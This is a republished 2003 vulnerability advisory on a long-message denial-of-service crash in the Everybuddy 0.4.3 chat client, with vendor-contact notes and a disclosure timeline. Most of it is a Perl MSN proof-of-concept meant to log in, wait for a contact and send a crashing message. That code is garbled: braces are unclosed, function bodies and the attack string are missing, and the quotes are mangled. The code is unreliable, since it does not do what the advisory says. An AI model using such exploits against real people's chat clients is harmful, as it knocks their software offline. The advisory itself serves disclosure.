‘Everybuddy Vulnerable to a DoS Attack (Long Message)’


Everybuddy has support for AIM, ICQ, MSN, Yahoo! and Jabber chat programs, the program contains a security vulnerability that allows remote attackers to cause the program to crash by sending it an overly long message (instant message).’


‘The information has been provided by Noam Rathaus and SecurITeam Experts.’


Vulnerable systems:
 * Everybuddy version 0.4.3

The exploit code will login as a user, wait for someone to talk to him, and send him the attack string.


use MSN; # from http://www.adamswann.com/library/2002/msn-perl/

my $client = MSN->new();
$client->connect(’email address’, ‘password’, ”, {
    Status => &Status,
    Answer => &Answer,
    Message => &Message,
    Join => &Join }

sub Status {
   my ($self, $username, $newstatus) = @_;

   print ‘Status() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

   # Print the status change info.
   print ‘${username}’s status changed from ‘ . $self->buddystatus($username) . ‘ to $newstatus.n’;

      # Initiate the call.

      # The call may take a few seconds to complete, so we can’t
      # immediately send messages. Let’s put the message in a
      # FIFO (queue) that is keyed by username.
      push (@{$queue{$username}}, ‘Glad to see you online!’);


sub Message {
   my ($self, $username, undef, $msg) = @_;

   print ‘Message() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;


sub Join {
   my ($self, $username) = @_;

   print ‘Join() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

   # See if there’s anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {

sub Answer {
   my ($self, $username) = @_;

   print ‘Answer() called with parameters:n’;
   print ‘ ‘ . join(‘,’, @_), ‘n’;

   # Send a hello message.


Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then disappeared again), we are forced to release this information, without receiving a proper response from them.

Disclosure timeline:
19/06/2003 – First attempt to contact vendor
20/06/2003 – First vendor response
22/06/2003 – PoC provided to vendor
01/07/2003 – Second attempt to contact vendor
01/08/2003 – Third attempt to contact vendor
05/08/2003 – Public advisory’

Categories: News